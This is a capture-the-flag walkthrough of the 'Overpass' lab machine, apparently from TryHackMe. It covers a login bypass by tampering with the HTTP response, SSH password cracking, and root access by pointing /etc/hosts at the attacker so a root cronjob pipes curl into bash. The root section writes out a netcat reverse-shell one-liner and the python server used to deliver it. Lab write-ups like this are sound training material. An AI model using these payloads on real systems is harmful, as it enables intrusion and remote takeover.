Overpass

Port Scan

Directory Scan

Web Exploitation

  • After seeing all the directories, /admin was most intresting to me

  • Looking at the source code I found some intresting .js files

  • login.js

  • This piece of code has an vulnerability, it checks the response of the browser and if it doesn't incorrect credentials, it redirect us to the /admin page

get admin privilege

  • Intercept login request with burp suite and change the response to get the admin panel

  • Right-click on the request and > Do intercept > Request to this response

  • This is the response we get

  • Updated response

  • Admin homepage

User Shell

  • we got username from the admin panel, I've used John to crack the SSH password

  • We successfully got a shell

Root shell

  • I've used python server to get linpeas into the machine

  • We have permission to write in /etc/hosts

  • There's a cronjob running on root service which basicallay uses curl and pipe it into bash

  • We are going to change the content of /etc/hosts , adding our ip as overpass.thm

  • First create files in your localhost

  • Add a payload in buildscript.sh

└─$ cat downloads/src/buildscript.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.250 4444 >/tmp/f
  • Add your ip and port [ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]

  • Start a python3 server

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.120.231 - - [02/Feb/2022 18:17:05] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
  • Start netcat listener

  • Wait around 1 minute to get root shell

Last updated